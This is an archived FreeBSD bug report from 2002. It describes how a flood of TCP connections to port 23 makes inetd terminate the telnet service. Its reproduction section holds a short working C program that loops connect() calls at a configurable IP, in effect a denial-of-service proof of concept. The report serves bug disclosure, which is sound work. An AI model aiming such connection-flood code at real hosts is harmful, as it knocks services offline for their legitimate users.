Date: Mon, 4 Nov 2002 13:40:43 -0800 (PST) From: Michele Possamai <possamai@xs4all.nl> To: freebsd-gnats-submit@FreeBSD.org Subject: misc/44894: as a local non-root user and remote it's possible to make telnet throw up. Message-ID: <200211042140.gA4Leh6L042730@www.freebsd.org>
next in thread | raw e-mail | index | archive | help
>Number: 44894
>Category: misc
>Synopsis: as a local non-root user and remote it's possible to make telnet throw up.
>Confidential: no
>Severity: non-critical
>Priority: low
>Responsible: freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Mon Nov 04 13:50:01 PST 2002
>Closed-Date:
>Last-Modified:
>Originator: Michele Possamai
>Release: FreeBSD-4.7-STABLE
>Organization:
>Environment:
FreeBSD tnt.yi.org 4.7-STABLE FreeBSD 4.7-STABLE #0: Thu Oct 17 21:43:25 CEST 2002 root@tnt.yi.org:/usr/src/sys/compile/SCORPIO i386
FreeBSD xs1.xs4all.nl 4.5-RELEASE-p19 FreeBSD 4.5-RELEASE-p19 #2: Mon Oct 21 01:50:10 CEST 2002 cor@xs0.xs4all.nl:/usr/src/sys/compile/XS4ALL-SMP i386
FreeBSD capricorn.tnt.intern 4.7-STABLE FreeBSD 4.7-STABLE #3: Thu Oct 10 20:25:13 CEST 2002 root@capricorn.tnt.intern:/usr/obj/usr/src/sys/CAPRICORN i386
FreeBSD mdv.xs4all.nl 4.6-STABLE FreeBSD 4.6-STABLE #2: Tue Aug 6 03:03:47 CEST 2002 3ewh2ep@mdv.xs4all.nl:/usr/obj/usr/src/sys/DOMINATOR i386
and probably more
>Description:
While expirimenting with C and sockets I accidently ran accross a little bitty bug. I just don't really know where the bug would be.. it's either in telnetd or in inetd.
But when running the program I wrote locally as a normal user I was able to dissable telnet access for a while... It does not effect running sessions but new connections just act like there's no service running on that port anymore. I don't really know what's happening.. but I first figured it out on the network.. so remote is possible as well. but local is just a lot faster.
The telnetd even really terminates with teh following message:
inetd[88]: telnet/tcp server failing (looping), service terminated
I know it's just telnet and it's not really a big deal. But I tryed a bsdi machine and it doesn't have the problem.. so it's not supposed to happen I guess..
>How-To-Repeat:
I used the following code to crash it locally.
just adjust the ip address to do it remote but it don't know how much bandwidth it needs..
/* code.c */
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define DEST_IP "127.0.0.1"
#define DEST_PORT 23
main()
{
for (;;) {
int sockfd;
struct sockaddr_in dest_addr;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
dest_addr.sin_addr.s_addr = inet_addr(DEST_IP);
memset(&(dest_addr.sin_zero), '\0', 8);
connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr));
}
}
/* end of code */
>Fix:
disable telnet.. it's better to use ssh anyway..
(don't know if other inetd processes might act the same as telnetd though..)
for a real fix: I don't even know what I wrote to crash it.. so I definatly don't know how to fix it
>Release-Note:
>Audit-Trail:
>Unformatted:
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-bugs" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200211042140.gA4Leh6L042730>